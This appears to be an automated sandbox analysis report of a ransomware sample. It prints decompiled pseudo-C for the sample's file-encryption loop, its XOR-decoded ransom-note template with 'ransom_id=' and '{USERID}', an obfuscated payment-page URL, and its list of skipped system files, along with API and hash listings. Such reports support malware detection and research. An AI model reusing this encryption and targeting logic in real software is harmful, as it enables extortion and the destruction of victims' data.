				_t92 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x88]");
				asm("movdqu [ebx], xmm0");
				asm("movdqu xmm0, [ebp-0x78]");
				_v44 = _t92;
				asm("movdqu [ebx+0x10], xmm0");
				_t93 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x64]");
				_t159 = _t93;
				_v48 = _t93;
				asm("movdqu [edi], xmm0");
				_v88 = 0x20;
				_v84 = 0x10;
				_t95 = E00406000(_v20, _v40, _t92,  &_v88, 0x800);
				_t169 = _t167 + 0x18;
				if(_t95 == 0) {
					L22:
					_t160 = _v32;
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x40], xmm0");
					_t164 = _v68;
					_v8 = _v64;
					L23:
					VirtualFree(_t160, 0, 0x8000);
					return _t164;
				}
				_t100 = E00406000(_v20, _v40, _t159,  &_v84, 0x800);
				_t170 = _t169 + 0x14;
				if(_t100 != 0) {
					E00407EE0( &_v140,  &_v388);
					_t171 = _t170 + 8;
					_t142 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
					_v36 = _t142;
					if(_t142 == 0xffffffff) {
						goto L22;
					}
					_t161 = VirtualAlloc(0, 8, 0x3000, 4);
					 *_t161 = 0;
					 *(_t161 + 4) = 0;
					_t106 = VirtualAlloc(0, 0x100001, 0x3000, 4);
					_t165 = 0;
					_v28 = _t106;
					_v24 = 0;
					while(ReadFile(_t142, _t106, 0x100000,  &_v12, 0) != 0) {
						_t121 = _v12;
						if(_t121 == 0) {
							break;
						}
						_t145 = 0;
						_v60 = 0;
						_t165 =  <  ? 1 : _t165;
						 *_t161 =  *_t161 + _t121;
						asm("adc [edi+0x4], ebx");
						_t122 = _v12;
						_v8 = _t122;
						if((_t122 & 0x0000000f) == 0) {
							L12:
							_t123 = VirtualAlloc(0, _t122, 0x3000, 4);
							_t42 =  &_v8; // 0x406438
							_v56 = _t123;
							E004084E0(_t123, _v28,  *_t42);
							_t125 = _v12;
							_t171 = _t171 + 0xc;
							_v64 = _t125;
							if(VirtualAlloc(0, _t125, 0x3000, 4) != 0) {
								E00403500(_v56, _v64,  &_v60,  &_v388,  &_v104, _t126);
								_t145 = _v60;
								_t171 = _t171 + 0x10;
							}
							VirtualFree(_v56, 0, 0x8000);
							SetFilePointer(_v36,  ~_v8, 0, 1);
							if(WriteFile(_v36, _t145, _v12,  &_v16, 0) == 0) {
								_t165 = 1;
								_v24 = 1;
							}
							VirtualFree(_t145, 0, 0x8000);
							_t142 = _v36;
							if(_t165 == 0) {
								_t106 = _v28;
								continue;
							} else {
								break;
							}
						}
						do {
							_t122 = _t122 + 1;
						} while ((_t122 & 0x0000000f) != 0);
						_v12 = _t122;
						goto L12;
					}
					VirtualFree(_v28, 0, 0x8000);
					if(_v24 == 0) {
						WriteFile(_t142, _v44, 0x100,  &_v16, 0);
						WriteFile(_t142, _v48, 0x100,  &_v16, 0);
						WriteFile(_t142, _t161, 0x10,  &_v16, 0);
					}
					CloseHandle(_t142);
					_t164 =  *_t161;
					_v8 =  *(_t161 + 4);
					VirtualFree(_t161, 0, 0x8000);
					VirtualFree(_v44, 0, 0x8000);
					VirtualFree(_v48, 0, 0x8000);
					_t160 = _v32;
					if(_v24 == 0) {
						MoveFileW(_v52, _t160);
					}
					goto L23;
				}
				GetLastError();
				goto L22;
			}

0x004035eb
0x004035ed
0x004035f1
0x004035ff
0x00403608
0x00403613
0x0040361f
0x00403621
0x0040363c
0x0040363e
0x00403647
0x0040364a
0x00403651
0x00403658
0x00403663
0x00403669
0x00403676
0x0040367e
0x0040367f
0x0040368a
0x0040368f
0x00403693
0x0040369b
0x004036a0
0x004036b0
0x004036c6
0x004036c8
0x004036de
0x004036e4
0x004036e9
0x004036ec
0x004036f1
0x004036f3
0x004036f8
0x00403703
0x00403706
0x0040370a
0x00403711
0x0040371f
0x0040372a
0x0040372f
0x0040397c
0x0040397c
0x0040397f
0x00403982
0x0040398a
0x0040398d
0x00403990
0x00403998
0x004039a5
0x004039a5
0x00403745
0x0040374a
0x0040374f
0x0040376a
0x0040376f
0x0040378d
0x0040378f
0x00403795
0x00000000
0x00403976
0x004037aa
0x004037b8
0x004037be
0x004037c5
0x004037c7
0x004037c9
0x004037cc
0x004037d4
0x004037ef
0x004037f4
0x00000000
0x00000000
0x004037fa
0x00403806
0x00403809
0x0040380c
0x0040380e
0x00403811
0x00403814
0x00403819
0x00403828
0x00403832
0x00403838
0x0040383b
0x00403842
0x00403847
0x0040384a
0x0040384d
0x00403862
0x0040387a
0x0040387f
0x00403882
0x00403882
0x0040388f
0x004038a2
0x004038bd
0x004038bf
0x004038c4
0x004038c4
0x004038cf
0x004038d5
0x004038da
0x004037d1
0x00000000
0x00000000
0x00000000
0x00000000
0x004038da
0x00403820
0x00403820
0x00403821
0x00403825
0x00000000
0x00403825
0x004038ea
0x004038f4
0x0040390b
0x0040391c
0x00403928
0x00403928
0x0040392b
0x00403934
0x00403944
0x00403947
0x00403953
0x0040395f
0x00403965
0x00403968
0x0040396e
0x0040396e
0x00000000
0x00403968
0x00403751
0x00000000

APIs

GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 004035F4
SetFileAttributesW.KERNEL32(00000000,00000000), ref: 004035FF
VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 0040363A
lstrcpyW.KERNEL32 ref: 00403658
lstrcatW.KERNEL32(00000000,0047002E), ref: 00403663

Part of subcall function 00407DB0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,74CB66A0,00000000), ref: 00407DD0
Part of subcall function 00407DB0: VirtualAlloc.KERNEL32(00000000,00000011,00003000,00000040), ref: 00407DF8
Part of subcall function 00407DB0: GetModuleHandleA.KERNEL32(?), ref: 00407E4D
Part of subcall function 00407DB0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407E5B
Part of subcall function 00407DB0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407E6A
Part of subcall function 00407DB0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407E8E
Part of subcall function 00407DB0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00407E9C

Part of subcall function 00407DB0: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004036A5), ref: 00407EB0
Part of subcall function 00407DB0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,004036A5), ref: 00407EBE

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 004036C6
VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 004036F1

Part of subcall function 00406000: EnterCriticalSection.KERNEL32(00412AE8,?,00403724,00000000,00000000,00000000,?,00000800), ref: 0040600B
Part of subcall function 00406000: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,00403724,00000000,00000000,00000000), ref: 0040602E
Part of subcall function 00406000: GetLastError.KERNEL32(?,00403724,00000000,00000000,00000000), ref: 00406038
Part of subcall function 00406000: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,00403724,00000000,00000000,00000000), ref: 00406054

VirtualFree.KERNEL32(?,00000000,00008000), ref: 00403998

Part of subcall function 00406000: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,00403724,00000000,00000000), ref: 00406089
Part of subcall function 00406000: CryptGetKeyParam.ADVAPI32(00000000,00000008,$7@,0000000A,00000000,?,00403724,00000000), ref: 004060AA
Part of subcall function 00406000: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,$7@,?,00403724,00000000), ref: 004060D2
Part of subcall function 00406000: GetLastError.KERNEL32(?,00403724,00000000), ref: 004060DB
Part of subcall function 00406000: CryptReleaseContext.ADVAPI32(00000000,00000000,?,00403724,00000000,00000000), ref: 004060F8
Part of subcall function 00406000: LeaveCriticalSection.KERNEL32(00412AE8,?,00403724,00000000,00000000), ref: 00406103

GetLastError.KERNEL32 ref: 00403751
CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000), ref: 00403787
VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000004), ref: 004037A6
VirtualAlloc.KERNEL32(00000000,00100001,00003000,00000004), ref: 004037C5
ReadFile.KERNEL32(00000000,00000000,00100000,?,00000000), ref: 004037E1
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00403832
_memmove.LIBCMT ref: 00403842
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0040385A
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040388F

Strings

, xrefs: 0040370A
D, xrefs: 0040364A
B, xrefs: 00403651
., xrefs: 0040363E
8d@, xrefs: 0040399A, 00403838

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: Virtual$Crypt$Alloc$Context$FileFree$AcquireErrorLastRelease$AttributesCriticalSection$AddressCreateEncryptEnterHandleImportLeaveLibraryLoadModuleParamProcRead_memmovelstrcatlstrcpy
String ID: $.$8d@$B$D
API String ID: 837238375-279925716
Opcode ID: 4a689ba4f940d7686604084ce9a7d8dc86564dea9efd080fee87f529fd1c3001
Instruction ID: e6440529c24e0b0f2c5be8c2954fde7d882e22268c9ef2e78ee628bee86a44a3
Opcode Fuzzy Hash: 4a689ba4f940d7686604084ce9a7d8dc86564dea9efd080fee87f529fd1c3001
Instruction Fuzzy Hash: 28B15DB1E40309BBEB119F94CD45FEEBBB8AB48700F204125F644BA2D1DBB45E448B98

Uniqueness

Uniqueness Score: -1.00%

Function 004040A0 Relevance: 47.4, APIs: 7, Strings: 20, Instructions: 167
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E004040A0(void* __ecx) {
				char _v148;
				char _v152;
				void* _v156;
				short _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				char _v232;
				WCHAR* _v236;
				WCHAR* _v240;
				void* _t44;
				void* _t48;
				void* _t50;
				signed int _t51;
				void* _t52;
				WCHAR* _t56;
				signed short _t60;
				signed short* _t61;
				WCHAR* _t68;
				signed int _t73;
				signed int _t74;
				void* _t77;
				void* _t80;
				long _t83;
				WCHAR* _t84;
				signed int _t87;
				void* _t88;
				WCHAR* _t90;
				void* _t92;
				WCHAR* _t113;

				if( *0x412b04 != 0) {
					L25:
					return _t44;
				}
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				E004039B0( &_v148);
				E00406D90( &_v236);
				_t87 = E00406BA0( &_v236);
				_t83 = 0x42 + _t87 * 2;
				_t48 = VirtualAlloc(0, _t83, 0x3000, 0x40);
				_v240 = _t48;
				if(_t48 == 0 || 0x40 + _t87 * 2 >= _t83) {
					_t88 = 0;
				} else {
					_t88 = _t48;
				}
				E004069A0( &_v152, _t88);
				_t50 = E00407BA0(_t88, L"ransom_id=");
				_t51 = lstrlenW(L"ransom_id=");
				asm("movdqa xmm1, [0x410940]");
				_t68 = 0x412000;
				_t77 = 0xad;
				_t90 = _t50 + _t51 * 2;
				_t52 = 0xad0;
				_v240 = _t90;
				do {
					_t13 =  &(_t68[8]); // 0x44004e
					_t68 = _t13;
					asm("movdqu xmm0, [ecx-0x10]");
					asm("pxor xmm0, xmm1");
					asm("movdqu [ecx-0x10], xmm0");
					_t77 = _t77 - 1;
				} while (_t77 != 0);
				do {
					 *(_t52 + 0x412000) =  *(_t52 + 0x412000) ^ 0x00000005;
					_t52 = _t52 + 1;
				} while (_t52 < 0xad6);
				 *0x412b04 = 0x412000;
				_t84 = E00407BA0(0x412000, L"{USERID}");
				if(_t84 == 0) {
					L21:
					_v232 = 0x740068;
					_v228 = 0x700074;
					_v224 = 0x2f003a;
					_v220 = 0x67002f;
					_v216 = 0x630064;
					_v212 = 0x670062;
					_v208 = 0x760068;
					_v204 = 0x79006a;
					_v200 = 0x790071;
					_v196 = 0x6a0037;
					_v192 = 0x6c0063;
					_v188 = 0x2e006b;
					_v184 = 0x6e006f;
					_v180 = 0x6f0069;
					_v176 = 0x2e006e;
					_v172 = 0x6f0074;
					_v168 = 0x2f0070;
					_v164 = 0;
					_t113 =  *0x412ae4; // 0x8d0000
					if(_t113 == 0) {
						_t56 = VirtualAlloc(0, 0x400, 0x3000, 4);
						 *0x412ae4 = _t56;
						if(_t56 != 0) {
							wsprintfW(_t56, L"%s%s",  &_v232, _t90);
						}
					}
					VirtualFree(_v156, 0, 0x8000);
					_t44 = E00407720( &_v152);
					goto L25;
				}
				while(1) {
					L11:
					lstrcpyW(_t84, _t90);
					_t84[lstrlenW(_t84)] = 0x20;
					_t84 = 0x412000;
					_t60 =  *0x412000; // 0xfeff
					if(_t60 == 0) {
						goto L21;
					}
					_t73 = _t60 & 0x0000ffff;
					_t92 = 0x412000 - L"{USERID}";
					do {
						_t61 = L"{USERID}";
						if(_t73 == 0) {
							goto L19;
						}
						while(1) {
							_t74 =  *_t61 & 0x0000ffff;
							if(_t74 == 0) {
								break;
							}
							_t80 = ( *(_t92 + _t61) & 0x0000ffff) - _t74;
							if(_t80 != 0) {
								L18:
								if( *_t61 == 0) {
									break;
								}
								goto L19;
							}
							_t61 =  &(_t61[1]);
							if( *(_t92 + _t61) != _t80) {
								continue;
							}
							goto L18;
						}
						_t90 = _v236;
						goto L11;
						L19:
						_t20 =  &(_t84[1]); // 0x2d002d
						_t73 =  *_t20 & 0x0000ffff;
						_t84 =  &(_t84[1]);
						_t92 = _t92 + 2;
					} while (_t73 != 0);
					_t90 = _v236;
					goto L21;
				}
				goto L21;
			}

0x004040b5
0x0040431c
0x00404321
0x00404321
0x004040bb
0x004040bc
0x004040be
0x004040bf
0x004040c4
0x004040c6
0x004040c7
0x004040c9
0x004040ca
0x004040cc
0x004040cd
0x004040cf
0x004040d0
0x004040d5
0x004040d7
0x004040d8
0x004040e1
0x004040ea
0x004040f8
0x00404101
0x0040410b
0x00404111
0x00404117
0x00404128
0x00404124
0x00404124
0x00404124
0x0040412f
0x0040413b
0x00404147
0x0040414d
0x00404155
0x0040415a
0x0040415f
0x00404162
0x00404167
0x00404170
0x00404170
0x00404170
0x00404173
0x00404178
0x0040417c
0x00404181
0x00404181
0x00404190
0x00404190
0x00404197
0x00404198
0x004041a4
0x004041b8
0x004041bc
0x0040423a
0x0040423c
0x00404244
0x0040424c
0x00404254
0x0040425c
0x00404264
0x0040426c
0x00404274
0x0040427c
0x00404284
0x0040428c
0x00404294
0x0040429c
0x004042a4
0x004042ac
0x004042b4
0x004042bc
0x004042c4
0x004042c9
0x004042cf
0x004042de
0x004042e4
0x004042eb
0x004042f9
0x004042ff
0x004042eb
0x0040430d
0x00404317
0x00000000
0x00404317
0x004041c0
0x004041c0
0x004041c2
0x004041d4
0x004041d8
0x004041dd
0x004041e6
0x00000000
0x00000000
0x004041ea
0x004041ed
0x004041f3
0x004041f3
0x004041fb
0x00000000
0x00000000
0x00404200
0x00404200
0x00404206
0x00000000
0x00000000
0x00404210
0x00404212
0x0040421d
0x00404221
0x00000000
0x00000000
0x00000000
0x00404221
0x00404214
0x0040421b
0x00000000
0x00000000
0x00000000
0x0040421b
0x00404322
0x00000000
0x00404227
0x00404227
0x00404227
0x0040422b
0x0040422e
0x00404231
0x00404236
0x00000000
0x00404236
0x00000000

APIs

Part of subcall function 004039B0: GetProcessHeap.KERNEL32(?,?,00404587,00000000,?,00000000), ref: 00403A4C

Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00406DB7
Part of subcall function 00406D90: GetUserNameW.ADVAPI32(00000000,?), ref: 00406DC8
Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00406DE6
Part of subcall function 00406D90: GetComputerNameW.KERNEL32 ref: 00406DF0
Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E10
Part of subcall function 00406D90: wsprintfW.USER32 ref: 00406E51
Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E6E
Part of subcall function 00406D90: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00406E92
Part of subcall function 00406D90: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,?,?), ref: 00406EB6
Part of subcall function 00406D90: RegCloseKey.KERNEL32(00000000), ref: 00406ED2

Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BF2
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BFD
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C13
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C1E
Part of subcall function 00406BA0: lstrlenW.KERNEL32(004048B6,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C34
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C3F
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C55
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C60
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C76
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C81
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C97
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CA2
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CC1
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CCC

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040410B
lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00404147
lstrcpyW.KERNEL32 ref: 004041C2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004041C9
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 004042DE

Strings

:, xrefs: 0040424C
%s%s, xrefs: 004042F3
j, xrefs: 00404274
{USERID}, xrefs: 0040419F, 004041ED, 004041F3
p, xrefs: 004042BC
n, xrefs: 004042AC
h, xrefs: 0040423C
7, xrefs: 00404284
b, xrefs: 00404264
t, xrefs: 00404244
i, xrefs: 004042A4
q, xrefs: 0040427C
/, xrefs: 00404254
t, xrefs: 004042B4
h, xrefs: 0040426C
c, xrefs: 0040428C
k, xrefs: 00404294
o, xrefs: 0040429C
ransom_id=, xrefs: 00404134, 00404140
d, xrefs: 0040425C

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
String ID: %s%s$/$7$:$b$c$d$h$h$i$j$k$n$o$p$q$ransom_id=$t$t${USERID}
API String ID: 4100118565-914392996
Opcode ID: 9ef8ab6f65e3180621a96e978af0e414a349b7cd4cbb51f09f0a87e37010286e
Instruction ID: 44f1d7409a56cb0d5c487c66e452f22c269fbcb55178584459732c151bd8d75b
Opcode Fuzzy Hash: 9ef8ab6f65e3180621a96e978af0e414a349b7cd4cbb51f09f0a87e37010286e
Instruction Fuzzy Hash: E451F5B06143009AE7209F11DD0976B7BA5EBC0748F404A3EFA817B2D1E7B8AD55C79E

Uniqueness

Uniqueness Score: -1.00%

Function 00404186 Relevance: 42.1, APIs: 5, Strings: 19, Instructions: 96
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404186(void* __eax, void* __ebp, WCHAR* _a12, char _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, short _a84, void* _a92, char _a96) {
				void* _t31;
				void* _t35;
				WCHAR* _t36;
				signed short _t40;
				signed short* _t41;
				signed int _t46;
				signed int _t47;
				void* _t50;
				WCHAR* _t51;
				WCHAR* _t53;
				void* _t56;
				WCHAR* _t72;

				_t31 = __eax;
				do {
					 *(_t31 + 0x412000) =  *(_t31 + 0x412000) ^ 0x00000005;
					_t31 = _t31 + 1;
				} while (_t31 < 0xad6);
				 *0x412b04 = 0x412000;
				_t51 = E00407BA0(0x412000, L"{USERID}");
				if(_t51 != 0) {
					while(1) {
						L4:
						lstrcpyW(_t51, _t53);
						_t51[lstrlenW(_t51)] = 0x20;
						_t51 = 0x412000;
						_t40 =  *0x412000; // 0xfeff
						if(_t40 == 0) {
							goto L14;
						}
						_t46 = _t40 & 0x0000ffff;
						_t56 = 0x412000 - L"{USERID}";
						do {
							_t41 = L"{USERID}";
							if(_t46 == 0) {
								goto L12;
							} else {
								while(1) {
									_t47 =  *_t41 & 0x0000ffff;
									if(_t47 == 0) {
										break;
									}
									_t50 = ( *(_t56 + _t41) & 0x0000ffff) - _t47;
									if(_t50 != 0) {
										L11:
										if( *_t41 == 0) {
											break;
										} else {
											goto L12;
										}
									} else {
										_t41 =  &(_t41[1]);
										if( *(_t56 + _t41) != _t50) {
											continue;
										} else {
											goto L11;
										}
									}
									goto L14;
								}
								_t53 = _a12;
								goto L4;
							}
							goto L14;
							L12:
							_t7 =  &(_t51[1]); // 0x2d002d
							_t46 =  *_t7 & 0x0000ffff;
							_t51 =  &(_t51[1]);
							_t56 = _t56 + 2;
						} while (_t46 != 0);
						_t53 = _a12;
						goto L14;
					}
				}
				L14:
				_a16 = 0x740068;
				_a20 = 0x700074;
				_a24 = 0x2f003a;
				_a28 = 0x67002f;
				_a32 = 0x630064;
				_a36 = 0x670062;
				_a40 = 0x760068;
				_a44 = 0x79006a;
				_a48 = 0x790071;
				_a52 = 0x6a0037;
				_a56 = 0x6c0063;
				_a60 = 0x2e006b;
				_a64 = 0x6e006f;
				_a68 = 0x6f0069;
				_a72 = 0x2e006e;
				_a76 = 0x6f0074;
				_a80 = 0x2f0070;
				_a84 = 0;
				_t72 =  *0x412ae4; // 0x8d0000
				if(_t72 == 0) {
					_t36 = VirtualAlloc(0, 0x400, 0x3000, 4);
					 *0x412ae4 = _t36;
					if(_t36 != 0) {
						wsprintfW(_t36, L"%s%s",  &_a16, _t53);
					}
				}
				VirtualFree(_a92, 0, 0x8000);
				_t35 = E00407720( &_a96);
				return _t35;
			}

0x00404186
0x00404190
0x00404190
0x00404197
0x00404198
0x004041a4
0x004041b8
0x004041bc
0x004041c0
0x004041c0
0x004041c2
0x004041d4
0x004041d8
0x004041dd
0x004041e6
0x00000000
0x00000000
0x004041ea
0x004041ed
0x004041f3
0x004041f3
0x004041fb
0x00000000
0x00404200
0x00404200
0x00404200
0x00404206
0x00000000
0x00000000
0x00404210
0x00404212
0x0040421d
0x00404221
0x00000000
0x00000000
0x00000000
0x00000000
0x00404214
0x00404214
0x0040421b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040421b
0x00000000
0x00404212
0x00404322
0x00000000
0x00404322
0x00000000
0x00404227
0x00404227
0x00404227
0x0040422b
0x0040422e
0x00404231
0x00404236
0x00000000
0x00404236
0x004041c0
0x0040423a
0x0040423c
0x00404244
0x0040424c
0x00404254
0x0040425c
0x00404264
0x0040426c
0x00404274
0x0040427c
0x00404284
0x0040428c
0x00404294
0x0040429c
0x004042a4
0x004042ac
0x004042b4
0x004042bc
0x004042c4
0x004042c9
0x004042cf
0x004042de
0x004042e4
0x004042eb
0x004042f9
0x004042ff
0x004042eb
0x0040430d
0x00404317
0x00404321

APIs

lstrcpyW.KERNEL32 ref: 004041C2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004041C9
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 004042DE
wsprintfW.USER32 ref: 004042F9
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040430D

Strings

:, xrefs: 0040424C
%s%s, xrefs: 004042F3
j, xrefs: 00404274
{USERID}, xrefs: 0040419F, 004041ED, 004041F3
p, xrefs: 004042BC
n, xrefs: 004042AC
h, xrefs: 0040423C
7, xrefs: 00404284
b, xrefs: 00404264
t, xrefs: 00404244
i, xrefs: 004042A4
q, xrefs: 0040427C
/, xrefs: 00404254
t, xrefs: 004042B4
h, xrefs: 0040426C
c, xrefs: 0040428C
k, xrefs: 00404294
o, xrefs: 0040429C
d, xrefs: 0040425C

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
String ID: %s%s$/$7$:$b$c$d$h$h$i$j$k$n$o$p$q$t$t${USERID}
API String ID: 4033391921-198931148
Opcode ID: 6847579bacb329ad28de8d3bfebd4ba97bf46600428eaa1bedf2c707f040ed1e
Instruction ID: b72f1aa0908df0bbc044f05aee074301ccc00ff49c2eba455c4c048f303cf63e
Opcode Fuzzy Hash: 6847579bacb329ad28de8d3bfebd4ba97bf46600428eaa1bedf2c707f040ed1e
Instruction Fuzzy Hash: C241D2B02043008BD7209F11995836BBAF1FFC5788F40892DFA85AB291D7B99955CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00406240 Relevance: 30.1, APIs: 11, Strings: 9, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00406240(WCHAR* __ecx) {
				int _t4;
				signed int _t5;
				signed int _t15;
				void* _t19;
				WCHAR* _t21;
				short* _t25;
				WCHAR* _t26;

				_t21 = __ecx;
				_t4 = lstrlenW(__ecx);
				_t5 = lstrlenW(_t21);
				_t1 = _t21 - 2; // -2
				_t25 = _t1 + _t5 * 2;
				_t19 = _t4 - 1;
				if(_t19 != 0) {
					do {
						_t25 = _t25 - 2;
						_t19 = _t19 - 1;
					} while ( *_t25 != 0x5c && _t19 != 0);
				}
				_t26 = _t25 + 2;
				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
						goto L5;
					} else {
